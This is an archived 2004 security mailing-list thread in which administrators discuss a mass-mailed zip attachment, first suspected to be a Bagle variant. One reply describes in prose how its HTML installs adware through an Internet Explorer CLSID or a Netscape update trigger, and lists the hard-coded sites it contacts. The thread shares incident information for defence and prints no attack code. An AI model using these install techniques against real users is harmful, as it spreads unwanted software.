Security Incidents mailing list archives
Re: New Mass Mailer Virus
From: "Thor" <thor () hammerofgod com>
Date: Mon, 9 Aug 2004 15:34:36 -0700
This one's not being caught by AV (trend, anyway) -- The zip file appears to have a randomized integer appended to the name. I've seen both price2.zip and price_8.zip Looks like Price.htm checks browser settings and does a document.write to install under IE with CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D- if netscape and launches and installs trigger.UpdateEnabled then it uses the trigger.startsoftwareupdate method. However, I show that as adware/spyware, not a Bagle variant... BargainBuddy, specifically. However, it does have probably a 100 web sites hard-coded into the exe that try to pull up www.domain.com/2.jpg. It is always 2.jpg looks like, but I was not able to get to that file on any of the referenced sites- got 404's on all but one, where I got " The image "http://www.dynex.ru/2.jpg" cannot be displayed, because it contains errors. " Just cursory observations... T ----- Original Message ----- From: "Jeff pRICHER" <jeffpricher () yahoo com> To: <incidents () securityfocus com> Sent: Monday, August 09, 2004 2:19 PM Subject: New Mass Mailer Virus
Looks like a new Bagle variant is one the loose. I saw several hundred in
my SMTP filter so far today. They have been arriving in a zip file with price.exe and price.html as the payload. It took some digging to find any information on the web for this and so far the best I've found is from SANS and can be read here http://isc.sans.org/
Current thread:
- New Mass Mailer Virus Jeff pRICHER (Aug 09)
- Re: New Mass Mailer Virus Jyri Hovila (Aug 10)
- Re: New Mass Mailer Virus Thor (Aug 10)
- <Possible follow-ups>
- Re: New Mass Mailer Virus Thor (Aug 10)
- RE: New Mass Mailer Virus Larsen, Colin (Aug 10)